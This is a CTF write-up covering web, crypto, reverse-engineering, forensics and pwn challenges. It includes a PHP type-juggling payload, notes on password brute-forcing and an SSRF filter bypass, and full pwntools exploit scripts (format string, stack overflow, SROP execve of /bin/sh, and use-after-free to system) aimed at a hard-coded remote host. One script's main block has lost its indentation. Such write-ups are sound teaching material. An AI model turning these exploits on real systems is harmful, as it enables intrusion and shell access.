Web
easyweb
代码审计弱类型和函数的特性
<?php
// Challenge source as published in the write-up. eregi() only exists before
// PHP 7, so the behaviours noted below are those of PHP 5.x.
// Review takeaways: compare with ===, check argument types before calling
// string functions, and use the binary-safe preg_match() instead of eregi().
show_source(__FILE__);
$v1=0;$v2=0;$v3=0;
$a=(array)json_decode(@$_GET['foo']);// decode the JSON in the "foo" parameter and cast the result to an array
if(is_array($a)){
is_numeric(@$a["bar1"])?die("nope"):NULL;// reject bar1 when it is a number or a numeric string
if(@$a["bar1"]){
($a["bar1"]>2021)?$v1=1:NULL;// loose comparison: type juggling lets a string that is not numeric for is_numeric() still compare as greater than 2021
}
if(is_array(@$a["bar2"])){
// bar2 must hold exactly 5 elements and its first element must itself be an array; failing either condition (OR) aborts
if(count($a["bar2"])!==5 OR !is_array($a["bar2"][0])) die("nope");
$pos = array_search("nudt", $a["a2"]);
// intended check: a2 must exist and contain the string "nudt"
// NOTE(review): only an exact false aborts; when a2 is not an array, array_search() presumably returns NULL with a warning on PHP 5, which passes this check - confirm on the target version
$pos===false?die("nope"):NULL;
foreach($a["bar2"] as $key=>$val){// walk every element of bar2
// no element of bar2 may be exactly the string "nudt" (strict comparison)
$val==="nudt"?die("nope"):NULL;
}
$v2=1;// required by the final check
}
}
$c=@$_GET['cat'];
$d=@$_GET['dog'];
if(@$c[1]){
if(!strcmp($c[1],$d) && $c[1]!==$d){
// both must hold: strcmp() reports "equal" while !== reports "different". On PHP 5, strcmp() given an array returns NULL (with a warning), and !NULL is true
eregi("3|1|c",$d.$c[0])?die("nope"):NULL;// abort when $d.$c[0] matches 3, 1 or c; eregi() is not binary-safe and stops reading at a NUL byte
strpos(($c[0].$d), "cstc2021")?$v3=1:NULL;
// strpos() returns the offset of "cstc2021" inside $c[0].$d; offset 0 and "not found" are both falsy, so the match must start after the first character
}
}
if($v1 && $v2 && $v3){
include "flag.php";
echo $flag;
}
?>
poc:?foo={"bar1":"2022a","bar2":[[1],2,3,4,5],"a2":"nudt"}&cat[1][]=111&cat[0]=12cstc2021&dog=%00
easyweb2
最开始通过扫描得到了路径swagger-ui.html
然后就经历特别多的测试,最后给了提醒使用token,而token是通过登录来获得的,这里就通过暴力破解了。成功暴力破解出test/test。
在看提示说需要获得管理员的token。然后发现有一个user-controller,那可能是暴力破解出admin用户
成功暴力破解
{"用户ID":"987","用户组":"系统管理员","用户名":"ctf_admin","HASH":"2773d5bd7e1a7a7eec619c6d5fbdfd3a"}
2773d5bd7e1a7a7eec619c6d5fbdfd3a解出为ctfer123!@#
所以ctf_admin/ctfer123!@#,重新登录。
获得管理员Token:9c618e664319512ef7db2d3c0672bee0
然后提示关注/home/index接口,猜一猜肯定是ssrf啦。这里经过fuzz出过滤了file,所以通过双写绕过。
成功获得flag
Crypto
RSA2
由于padding的范围很小,通过小公钥指数攻击(直接对密文开三次方)可以估算出e的取值范围;这个范围很小,逐个枚举即可,所以e可以视为已知
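# Integer cube roots of the two small ciphertexts. The write-up treats each
# root as e plus a padding value (presumably c_i = (e + padding_i) ** 3; the
# challenge source is not shown, so confirm against it).
e_small = gmpy2.iroot(c1, 3)[0]
e_big = gmpy2.iroot(c2, 3)[0]
if e_small > e_big:
    e_small, e_big = e_big, e_small

# Known padding range.
start = 20210401
end = 20210505

# With start <= padding <= end:  e >= e_big - end  and  e <= e_small - start.
# Subtracting the bounds the other way round gives e_min > e_max, i.e. an
# empty search range; this form matches the full script and the values below.
e_min = e_big - end
e_max = e_small - start

# Values obtained for this challenge:
# e_min = 53860
# e_max = 53957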
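因为 $g = d \cdot (p - \mathrm{0xdeadbeef})$,且 e 已知,把指数再乘上 e,在 mod n 的条件下即可消去 d(因为 $ed \equiv 1 \pmod{\varphi(n)}$)。又因 0xdeadbeef 为常数,可以通过构造消去:$2^{eg} \cdot 2^{\mathrm{0xdeadbeef}-1} \equiv 2^{p-1} \equiv 1 \pmod p$,于是该值减 1 具有 K*p 的结构,将其与 n 求最大公因数即可分解 n,并可以同时确定 e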
# The factor that cancels the constant 0xdeadbeef does not depend on e, so it
# is computed once.
const_factor = pow(2, 0xdeadbeef - 1, n)

# For the right e the product is congruent to 2**(p - 1), i.e. to 1 modulo p,
# so gcd(kp - 1, n) exposes p; the search stops at the first gcd other than 1.
for e in range(e_min, e_max):
    kp = pow(2, e * g, n) * const_factor
    p = gmpy2.gcd(kp - 1, n)
    if p == 1:
        continue
    break
已知e,n,p则可以分解出q,从而求出d,之后则可以通过常规的rsa解密
EXP
from gmpy2 import *
from Crypto.Util.number import *
c1 = 8321449807360182827125
c2 = 8321441183828895770712
n = 378094963578091245652286477316863605753157432437621367359342302751615833557269627727449548734187939542588641672789504086476494927855747407344197241746889123693358997028141479289459947165818881146467218957546778123656120190207960702225556466771501844979094137868818924556860636212754616730115341674681116573326890134855072314950288530400350483394140781434097516134282100603979066057391672872913866678519235744668652042193736205044674422210689619562242862928626697711582401250962536787125165979017740138070213899305175933585261127763164192929103624167063213758551239415744211455417108907505646457646161227272639379721764779734013149963229002406400371319674194009206372087547010201440035410745572669645666856126204769178179570446069571090298945041726576151255620825221663591127702492882834949100599423704250729752444923956601971323645242934249137015933524911614158989705977723056398299344849153945858516695027157652464450872079484515561281333287781393423326046633891002695625031041881639987758851943448352789469117137668229144914356042850963002345804817204906458653402636643504354041188784842235312540435896510716835069861282548640947135457702591305281493685478066735573429735004662804458309301038827671971059369532684924420835204769329
g = 3976547671387654068675440379770742582328834393823569801056509684207489138919660098684138301408123275651176128285451251938825197867737108706539707501679646427880324173378500002196229085818500327236191128852790859809972892359594650456622821702698053681562517351687421071768373342718445683696079821352735985061279190431410150014034774435138495065087054406766658209697164984912425266716387767166412306023197815823087447774319129788618337421037953552890681638088740575829299105645000980901907848598340665332867294326355124359170946663422578346790893243897779634601920449118724146276125684875494241084873834549503559924080309955659918449396969802766847582242135030406950869122744680405429119205293151092844435803672994194588162737131647334232277272771695918147050954119645545176326227537103852173796780765477933255356289576972974996730437181113962492499106193235475897508453603552823280093173699555893404241432851568898226906720101475266786896663598359735416188575524152248588559911540400610167514239540278528808115749562521853241361159303154308894067690191594265980946451318139963637364985269694659506244498804178767180096195422200695406893459502635969551760301437934119795228790311950304181431019690890246807406970364909654718663130558117158600409638504924084063884521237159579000899800018999156006858972064226744522780397292283123020800063335841101274936236800443981678756303192088585798740821587192495178437647789497048969720110685325336457005611803025549386897596768084757320114036370728368369612925685987251541629902437275412553261624335378768669846356507330025425467339014984330079364067149950238561943275006049728406278318846998650496707162387768801213108565185221147664770009978012050906904959264045050100404522270495606970447076283894255951481388496134870426452215997834228869196114684962261076716651779120620585343304887755029463545328534291186
c = 141187369139586875794438918220657717715220514870544959295835385681523005285553297337947377472083695018833866941104904071675141602626896418932763833978914936423338696805941972488176008847789235165341165167654579559935632669335588215515509707868555632337151209369075754122977694992335834572329418404770856890386340258794368538033844221701815983303376617825048502634692029763947325144731383655217790212434365368739783525966468588173561230342889184462164098771136271291295174064537653917046323835004970992374805340892669139388917208009182786199774133598205168195885718505403022275261429544555286425243213919087106932459624050446925210285141483089853704834315135915923470941314933036149878195756750758161431829674946050069638069700613936541544516511266279533010629117951235494721973976401310026127084399382106355953644368692719167176012496105821942524500275322021731162064919865280000886892952885748100715392787168640391976020424335319116533245350149925458377753639177017915963618589194611242664515022778592976869804635758366938391575005644074599825755031037848000173683679420705548152688851776996799956341789624084512659036333082710714002440815131471901414887867092993548663607084902155933268195361345930120701566170679316074426182579947
# Padding bounds used by the write-up.
start = 20210401
end = 20210505

# Integer cube roots of the two small ciphertexts, ordered smallest first.
e_small, e_big = sorted((iroot(c1, 3)[0], iroot(c2, 3)[0]))
assert e_small < e_big

# Candidate window for e derived from the padding bounds.
e_min = e_big - end
e_max = e_small - start
# For this challenge: e_min = 53860, e_max = 53957

# Factor that cancels the constant 0xdeadbeef; independent of e.
blind = pow(2, 0xdeadbeef - 1, n)

# Stop at the first candidate whose gcd with n is not 1.
for e in range(e_min, e_max):
    kp = pow(2, e * g, n) * blind
    p = gcd(kp - 1, n)
    if p != 1:
        break

# Ordinary RSA decryption once n is split into p and q.
q = n // p
phi = (q - 1) * (p - 1)
d = invert(e, phi)
print(long_to_bytes(pow(c, d, n)))
Re
free_flag
首先反编译,可以知道关心的应该是Pin的值
找到对Pin进行了引用的地方,异或
找到byte_B98数组的值,异或一下12
#include <stdio.h>
/* Bytes the write-up copied out of the binary's byte_B98 table. */
unsigned char ida_chars[] =
{
    120, 100, 63, 83, 109, 121, 120, 100, 98, 63,
    120, 61, 111, 56, 61, 120, 60, 98, 83, 57,
    117, 57, 120, 63, 97, 83, 61, 57, 83, 98,
    60, 120, 83, 60, 57, 83, 57, 63, 111, 121,
    126, 63, 10
};

/* XOR every table byte with 12 (0xc) and print the result, the last byte included. */
int main()
{
    const unsigned char *cur = ida_chars;
    const unsigned char *const stop = ida_chars + sizeof(ida_chars);

    while (cur != stop)
        putchar(*cur++ ^ 0xc);
}
crackme
逆向菜鸡做这个绕了个大圈。。。
胡乱找了很久,找到关键代码,然后慢慢看了很久的算法。。
开始是一个长度判断
然后算法,看了很久,感觉复杂啊
上面折磨了很久,然后就去看了看第二部分计算,艹,马上就没做计算,直接比较,那我之前看的第一部算法,不用管啊。。。。
最后,我单步调试一个一个得到计算完的值,再md5,完事
ck
感觉,这个题碰运气,哈哈哈
ida反编译后直接搜索字符串
第一个字符串就很可疑,
然后直接x,找字符串引用,发现新天地
这不是base64加密嘛,从 = 也可以猜想
所以这就是一个换表base64嘛
简单:
import base64
# Custom 64-symbol alphabet found in the binary.
# NOTE(review): 'd' occurs twice in it (indices 19 and 62), so the later
# mapping wins; the ciphertext below contains no 'd', so the result is unaffected.
s = ",.0fgWV#`/1Heox$~\"2dity%_;j3csz^+@{4bKrA&=}5laqB*-[69mpC()]78ndu"
print(len(s))

# Standard base64 alphabet.
table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
enc = 'ef"^sVK@3r@Ke4e6%6`)'

# Swap each custom symbol for the standard symbol at the same index, then
# decode the result as ordinary base64.
symbol_map = {ord(custom): std for custom, std in zip(s, table)}
ans = enc.translate(symbol_map)
print(base64.b64decode(ans))
得到:04_tianhe233_29。
md5,得到flag
maze
迷宫题
没有什么坑,还给了游戏熟悉的aswd,贴心
让程序跑起来,然后提取出数据,C语言中打印成7*7规模,最后手走一下即可,当然要写搜索算法来跑感觉也行,锻炼一下 hahhah,赛后尝试一下
#include <stdio.h>
/* 7x7 grid dumped from the running program, row-major. The path quoted in the
 * write-up only steps on cells holding 1, so 1 is presumably an open cell and
 * 0 a wall. */
unsigned int data[49] = {
    1, 0, 0, 1, 1, 1, 1,
    1, 0, 1, 1, 0, 0, 1,
    1, 1, 1, 0, 1, 1, 1,
    0, 0, 0, 1, 1, 0, 0,
    1, 1, 1, 1, 0, 0, 0,
    1, 0, 0, 0, 1, 1, 1,
    1, 1, 1, 1, 1, 0, 1
};

/* Print the grid, seven cells per line. */
int main(void)
{
    int idx;

    for (idx = 0; idx < 49; idx++)
    {
        printf("%d ", data[idx]);
        if (idx % 7 == 6)
            putchar(10);   /* newline after the last cell of a row */
    }
}
终点就是最后一个点!
ssddwdwdddssaasasaaassddddwdds
再md5一下得到flag。
Misc
RGB
找到了类似的题https://www.cnblogs.com/webFuckeeeer/p/4536776.html
顺着来就可以做出来
通过图片size分解了一下:176和164比较合适
#-*- coding:utf-8 -*-
from PIL import Image
import re
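x = 503  # image width: one factor of the number of lines in the txt file
y = 122  # image height: x * y = number of lines
# NOTE(review): the surrounding write-up mentions 176 and 164 as candidate
# dimensions while this script uses 503 x 122 -- confirm which pair applies.
im = Image.new("RGB", (x, y))  # blank canvas

# The file holds one "r,g,b" line per pixel; consecutive lines fill one image
# column (the inner loop runs over y). The context manager closes the file
# even when a line is malformed.
with open('misc100.txt') as file:
    for i in range(x):
        for j in range(y):
            line = file.readline()
            if not line.strip():
                # A short file would otherwise fail with an opaque int('') error.
                raise ValueError(
                    "misc100.txt ended before pixel (%d, %d)" % (i, j)
                )
            red, green, blue = (int(v) for v in line.split(",")[:3])
            im.putpixel((i, j), (red, green, blue))
im.show()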
zip
有个加密的压缩包,没有任何提示.一点点爆破出来的密码是ff123
出来一个加密的docx文件,无法爆破.
还有一个readme.txt文档,里面好像是培根密码
解密docx,直接strings命令发现flag
memory1
搜了一下,vmem文件常用volatility进行取证
由于我kali是2020版,就只能在powershell里操作了
先确定imageinfo
再用pstree找相关的进程
找到一个后门metsvc.exe,看是谁调用的:
cmdline参数:
metsvc.exe pid: 1908 ************************************************************************ metsvc.exe pid: 400 Command line : "C:\Windows\TEMP\cybSAbYRflAvhz\metsvc.exe" service ************************************************************************ metsvc-server. pid: 1912 ************************************************************************ cscript.exe pid: 1472 Command line : cscript "C:\Windows\TEMP\UEAOGWBdwyydm.vbs"
这个vbs就很像了,试了一下确实正确
Pwn
bank
密码为随机值。若密码的第一个字节恰好为'\x00',而我们的输入也是'\x00',则二者比较相等,所以每次都输入'\x00',成功几率为1/256;再通过格式化字符串漏洞将堆中的flag打印出来即可。
exp
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
# Shorthands over the global pwntools tube `io`, which the main section binds
# before any of them is called.
def r(x):
    return io.recv(x)

def ra():
    return io.recvall()

def rl():
    return io.recvline(keepends=True)

def ru(x):
    return io.recvuntil(x, drop=True)

def s(x):
    return io.send(x)

def sl(x):
    return io.sendline(x)

def sa(x, y):
    return io.sendafter(x, y)

def sla(x, y):
    return io.sendlineafter(x, y)

def ia():
    return io.interactive()

def c():
    return io.close()

def li(x):
    # Log x wrapped in an ANSI colour escape sequence.
    return log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

# pwntools settings: verbose tube logging; debugger windows open in a tmux split.
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

# Target binary and libc. The second libc_path assignment is the one in effect.
elf_path = 'bank'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'

# Remote service as "ip:port".
host = "81.70.195.166:10000"

# LOCAL: run the local binary instead of connecting. LIBC: also load libc_path.
LOCAL = 0
LIBC = 0
#--------------------------func-----------------------------
def db():
    """Attach gdb to the current tube; does nothing unless LOCAL is set."""
    if not LOCAL:
        return
    gdb.attach(io)
#--------------------------exploit--------------------------
def exploit():
    """Replay the interaction described in the write-up for the bank service.

    Per the write-up, the random password matches a lone NUL byte whenever its
    first byte is NUL, and a later input is used as a format string that
    prints the flag kept on the heap.

    Review takeaways for the service: compare secrets over their full fixed
    length rather than as NUL-terminated strings, and never pass user input as
    the format argument of a printf-style call.
    """
    li('exploit...')
    first_answer = 'A'
    sla(':', first_answer)
    # Password guess: a single NUL byte.
    sl('\x00')
    ru('?')
    sl('yes')
    #db()
    # Input that the service interprets as a format string.
    sl('%8$s')


def finish():
    """Hand the tube to the user, then close it when the session ends."""
    ia()
    c()
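#--------------------------main-----------------------------
if __name__ == '__main__':
    # The write-up puts the chance of a matching password at 1/256 per
    # connection, hence the bounded retry loop.
    #
    # The ELF files are parsed once, outside the loop: a missing binary now
    # fails immediately instead of being swallowed on every iteration.
    elf = ELF(elf_path)
    if LIBC:
        libc = ELF(libc_path)

    for i in range(255):
        io = None
        try:
            if LOCAL:
                io = elf.process()
            else:
                io = remote(host.split(':')[0], int(host.split(':')[1]))
            exploit()
            finish()
        except Exception:
            # Catch Exception rather than using a bare except, so that
            # Ctrl-C / SystemExit can stop the loop instead of being swallowed.
            # The tube of a failed attempt is closed rather than leaked.
            if io is not None:
                io.close()
            continue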
auto
先用angr(符号执行)求解出能进入login_again函数的输入
angr脚本如下:
import angr
from binascii import b2a_hex
import logging
import sys
# Show angr's progress messages.
logging.getLogger('angr').setLevel('INFO')
#logging.getLogger('angr').setLevel('CRITICAL')


def angr_main():
    """Print, as hex, a stdin input that reaches the call to login_again.

    Symbolically explores ./auto from its entry point until the address
    0x0804867E is reached and dumps the stdin of the first state found.
    """
    project = angr.Project('./auto')
    manager = project.factory.simgr(project.factory.entry_state())
    manager.explore(find=0x0804867E)  # call login_again
    stdin_bytes = manager.found[0].posix.dumps(0)
    print(stdin_bytes.hex(), end='')


angr_main()
login_again就是个堆栈溢出了,程序留有后门,直接跳到后门函数即可。
exp
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
# Shorthands over the global pwntools tube `io`, which the main section binds
# before any of them is called.
def r(x):
    return io.recv(x)

def ra():
    return io.recvall()

def rl():
    return io.recvline(keepends=True)

def ru(x):
    return io.recvuntil(x, drop=True)

def s(x):
    return io.send(x)

def sl(x):
    return io.sendline(x)

def sa(x, y):
    return io.sendafter(x, y)

def sla(x, y):
    return io.sendlineafter(x, y)

def ia():
    return io.interactive()

def c():
    return io.close()

def li(x):
    # Log x wrapped in an ANSI colour escape sequence.
    return log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

# pwntools settings: verbose tube logging; debugger windows open in a tmux split.
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

# Target binary and libc. The second libc_path assignment is the one in effect.
elf_path = 'auto'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'

# Remote service as "ip:port".
host = "81.70.195.166:10001"

# LOCAL: run the local binary instead of connecting. LIBC: also load libc_path.
LOCAL = 0
LIBC = 0
#--------------------------func-----------------------------
def db():
    """Attach gdb to the current tube; does nothing unless LOCAL is set."""
    if not LOCAL:
        return
    gdb.attach(io)
#--------------------------exploit--------------------------
def exploit():
    """Replay the two inputs described in the write-up for the auto binary.

    The first input is the 8-byte value the angr run produced to reach
    login_again; the second overruns the buffer read there and replaces the
    return address with 0x08048665, which the write-up identifies as the
    backdoor function.

    Review takeaways for the binary: bound the read in login_again to the
    buffer size and do not ship a backdoor function; the hard-coded code
    address presumably also means the binary is not position-independent.
    """
    li('exploit...')
    # 55 58 59 55 4b 56 4e 5a
    login_input = '\x55\x58\x59\x55\x4b\x56\x4e\x5a'
    s(login_input)
    #db()
    # 0x48 filler bytes, one zeroed 32-bit word, then the new return address.
    overflow = b'\x00' * 0x48 + p32(0x0) + p32(0x08048665)
    sl(overflow)


def finish():
    """Hand the tube to the user, then close it when the session ends."""
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    # The binary is parsed in both modes; only the tube differs.
    elf = ELF(elf_path)
    if LOCAL:
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        target_host, target_port = host.split(':')
        io = remote(target_host, int(target_port))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()
small
采用srop进行构造出execve("/bin/sh", 0, 0)拿 shell
exp
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
# Shorthands over the global pwntools tube `io`, which the main section binds
# before any of them is called.
def r(x):
    return io.recv(x)

def ra():
    return io.recvall()

def rl():
    return io.recvline(keepends=True)

def ru(x):
    return io.recvuntil(x, drop=True)

def s(x):
    return io.send(x)

def sl(x):
    return io.sendline(x)

def sa(x, y):
    return io.sendafter(x, y)

def sla(x, y):
    return io.sendlineafter(x, y)

def ia():
    return io.interactive()

def c():
    return io.close()

def li(x):
    # Log x wrapped in an ANSI colour escape sequence.
    return log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

# pwntools settings: verbose tube logging; debugger windows open in a tmux
# split; amd64 is set so the signal frames are built for the right architecture.
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'

# Target binary and libc. The second libc_path assignment is the one in effect.
elf_path = 'small'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'

# Remote service as "ip:port".
host = "81.70.195.166:10002"

# LOCAL: run the local binary instead of connecting. LIBC: also load libc_path.
LOCAL = 0
LIBC = 0
#--------------------------func-----------------------------
def db():
    """Attach gdb to the current tube; does nothing unless LOCAL is set."""
    if not LOCAL:
        return
    gdb.attach(io)
#--------------------------exploit--------------------------
def exploit():
    """Replay the write-up's SROP sequence ending in execve("/bin/sh", 0, 0).

    Two signal frames are sent in turn: the first requests a read into .bss,
    the second an execve of the string that read placed there. Each frame is
    followed by a 15-byte send (the original comment: "set rax=15 and call
    sigreturn").

    Review takeaway for the binary: the sequence starts from an unbounded read
    over a 0x18-byte region (presumably a stack buffer); bounding that read
    removes the entry point.
    """
    li('exploit...')
    syscall_ret = 0x40100A
    vul_addr = 0x40100D
    bss = elf.bss() + 0x100
    pause = 0.1

    def build_frame(sysno, rdi, rsi, rdx):
        # Signal frame with the given syscall number and arguments; stack and
        # instruction pointer are the same for both stages.
        frame = SigreturnFrame()
        frame.rax = sysno
        frame.rdi = rdi
        frame.rsi = rsi
        frame.rdx = rdx
        frame.rsp = bss + 0x18
        frame.rip = syscall_ret
        return frame

    chain = p64(vul_addr) + p64(syscall_ret)
    # set rax=15 and call sigreturn
    trigger = b'\x00' * 15

    # Stage 1: frame for read(0, bss, 0x200).
    read_frame = build_frame(constants.SYS_read, 0, bss, 0x200)
    s(b'\x11' * 0x18 + chain + bytes(read_frame))
    sleep(pause)
    s(trigger)

    # Stage 2: "/bin/sh" lands at bss, followed by the execve frame.
    exec_frame = build_frame(constants.SYS_execve, bss, 0x0, 0x0)
    stage2 = b'/bin/sh\x00' + b'\x00' * 0x10 + chain + bytes(exec_frame)
    sleep(pause)
    s(stage2)
    # call sigreturn
    #db()
    sleep(pause)
    s(trigger)


def finish():
    """Hand the tube to the user, then close it when the session ends."""
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    # The binary is parsed in both modes; only the tube differs.
    elf = ELF(elf_path)
    if LOCAL:
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        target_host, target_port = host.split(':')
        io = remote(target_host, int(target_port))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()
paper
uaf漏洞,开辟堆块到v8 - 8处,修改v9值为0xcccccccc拿shell。
exp
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
# Shorthands over the global pwntools tube `io`, which the main section binds
# before any of them is called.
def r(x):
    return io.recv(x)

def ra():
    return io.recvall()

def rl():
    return io.recvline(keepends=True)

def ru(x):
    return io.recvuntil(x, drop=True)

def s(x):
    return io.send(x)

def sl(x):
    return io.sendline(x)

def sa(x, y):
    return io.sendafter(x, y)

def sla(x, y):
    return io.sendlineafter(x, y)

def ia():
    return io.interactive()

def c():
    return io.close()

def li(x):
    # Log x wrapped in an ANSI colour escape sequence.
    return log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

# pwntools settings: verbose tube logging; debugger windows open in a tmux split.
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

# Target binary and libc. The second libc_path assignment is the one in effect.
elf_path = 'paper'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'

# Remote service as "ip:port".
host = "81.70.195.166:10003"

# LOCAL: run the local binary instead of connecting. LIBC: also load libc_path.
LOCAL = 0
LIBC = 0
#--------------------------func-----------------------------
def db():
    """Attach gdb to the current tube; does nothing unless LOCAL is set."""
    if not LOCAL:
        return
    gdb.attach(io)


# One wrapper per menu entry of the service. Each answers the '>' menu prompt
# with its option number and then the follow-up prompts, in order.
def ad():
    """Menu option 1 (no arguments)."""
    sla('>', '1')


def rm(idx):
    """Menu option 2, then idx at the ':' prompt."""
    for prompt, reply in (('>', '2'), (':', str(idx))):
        sla(prompt, reply)


def wt(idx, n):
    """Menu option 3, then idx and n at the two ':' prompts."""
    for prompt, reply in (('>', '3'), (':', str(idx)), (':', str(n))):
        sla(prompt, reply)


def fd():
    """Menu option 4 (no arguments)."""
    sla('>', '4')


def mv(idx):
    """Menu option 5, then idx at the '?' prompt."""
    for prompt, reply in (('>', '5'), ('?', str(idx))):
        sla(prompt, reply)


def sh():
    """Menu option 6 (no arguments)."""
    sla('>', '6')
#--------------------------exploit--------------------------
def exploit():
    """Replay the menu sequence described in the write-up for the paper binary.

    Per the write-up this is a use-after-free: a freed entry is still
    writable, which lets a later allocation be placed at v8 - 8 so that the
    value v9 can be set to 0xcccccccc before option 6 is chosen.

    Review takeaway for the binary: clear the stored pointer when an entry is
    freed and reject menu operations on freed entries.
    """
    li('exploit...')
    ad()
    rm(0)
    fd()
    # Option 4 prints an address; the 12 hex digits after "0x" are read back.
    ru('0x')
    leaked_hex = r(12)
    v8 = int(leaked_hex, 16)
    li('v8: ' + hex(v8))
    mv(0x21)
    # Write through the already-freed entry 0.
    wt(0, v8 - 8)
    for _ in range(2):  # allocations 1 and 2
        ad()
    wt(2, 0xCCCCCCCC)
    sh()
    #db()


def finish():
    """Hand the tube to the user, then close it when the session ends."""
    ia()
    c()
if __name__ == '__main__':
if LOCAL:
elf = ELF(elf_path)
if LIBC:
libc = ELF(libc_path)
io = elf.process()
else:
elf = ELF(elf_path)
io = remote(host.split(':')[0], int(host.split(':')[1]))
if LIBC:
libc = ELF(libc_path)
exploit()
finish()
managebooks
漏洞为uaf,在打印Summary函数中,采用函数指针调用,修改该函数指针,即可劫持rip,先泄漏libc,再调用system即可。
exp
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
# Shorthands over the global pwntools tube `io`, which the main section binds
# before any of them is called.
def r(x):
    return io.recv(x)

def ra():
    return io.recvall()

def rl():
    return io.recvline(keepends=True)

def ru(x):
    return io.recvuntil(x, drop=True)

def s(x):
    return io.send(x)

def sl(x):
    return io.sendline(x)

def sa(x, y):
    return io.sendafter(x, y)

def sla(x, y):
    return io.sendlineafter(x, y)

def ia():
    return io.interactive()

def c():
    return io.close()

def li(x):
    # Log x wrapped in an ANSI colour escape sequence.
    return log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

# pwntools settings: verbose tube logging; debugger windows open in a tmux split.
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

# Target binary and the libc used for local runs (the main section switches to
# ./libc.so.6 for the remote case).
elf_path = 'managebooks'
libc_path = '/glibc/2.27/64/lib/libc.so.6'

# Remote service as "ip:port".
host = "81.70.195.166:10004"

# LOCAL: run the local binary instead of connecting. LIBC: also load libc_path.
LOCAL = 0
LIBC = 1
#--------------------------func-----------------------------
def db():
    """Attach gdb to the current tube; does nothing unless LOCAL is set."""
    if not LOCAL:
        return
    gdb.attach(io)


# One wrapper per menu entry of the service. Each answers the '>>' menu prompt
# with its option number and then the ':' prompts, in order. Sizes and indexes
# are sent as lines; name and data are sent raw, without a trailing newline.
def ad(name_sz, name, data_sz, data):
    """Menu option 1: name size, name, data size, data."""
    sla('>>', '1')
    sla(':', str(name_sz))
    sa(':', name)
    sla(':', str(data_sz))
    sa(':', data)


def rm(idx):
    """Menu option 2, then idx."""
    for prompt, reply in (('>>', '2'), (':', str(idx))):
        sla(prompt, reply)


def ch(idx, sz, data):
    """Menu option 3: idx, size, then the raw data."""
    for prompt, reply in (('>>', '3'), (':', str(idx)), (':', str(sz))):
        sla(prompt, reply)
    sa(':', data)


def rd(idx):
    """Menu option 4, then idx."""
    for prompt, reply in (('>>', '4'), (':', str(idx))):
        sla(prompt, reply)
#--------------------------exploit--------------------------
def exploit():
    """Replay the menu sequence described in the write-up for managebooks.

    Per the write-up this is a use-after-free: the routine that prints a
    summary calls through a function pointer stored in a book entry, and a
    freed entry can be re-filled so that this pointer is attacker-chosen. The
    sequence first points it at puts to leak a libc address and then at
    system.

    Review takeaway for the binary: clear entry pointers on free, refuse
    double frees and operations on freed entries, and avoid keeping function
    pointers inside user-writable heap objects.
    """
    bookcase = 0x6020C0
    li('exploit...')
    ad(0x10, 'AAAA', 0x500, 'bbbb')
    for _ in range(2):
        rm(0)
    ch(0, 0x80, '\x10')  # free sum and alloc
    puts_plt = p64(elf.plt['puts'])
    ad(0x10, puts_plt, 0x30, '/bin/sh\x00')  # 1
    # Disabled alternative kept from the original:
    #   rm(0)
    #   #ad(0x10, p64(bookcase), 0x20, 'bbbb')
    rd(0)  # leak libc
    leaked_tail = ru('\x7f')[-5:]
    leak = u64(leaked_tail + b'\x7f\x00\x00')
    # Distance of the leaked pointer from the libc base; the constants are
    # specific to the libc build in use (presumably 2.27, per libc_path).
    leak_offset = libc.sym['__malloc_hook'] + 976 + 0x10
    libc_base = leak - leak_offset
    li('libc_base: ' + hex(libc_base))
    for _ in range(2):
        rm(1)
    system_ptr = p64(libc_base + libc.sym['system'])
    ad(0x10, system_ptr, 0x30, '\x00')  # 1
    #db()
    rd(1)  # call system


def finish():
    """Hand the tube to the user, then close it when the session ends."""
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    # The binary is parsed in both modes; the remote case swaps in the libc
    # shipped next to the script.
    elf = ELF(elf_path)
    if LOCAL:
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        libc_path = './libc.so.6'
        target_host, target_port = host.split(':')
        io = remote(target_host, int(target_port))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()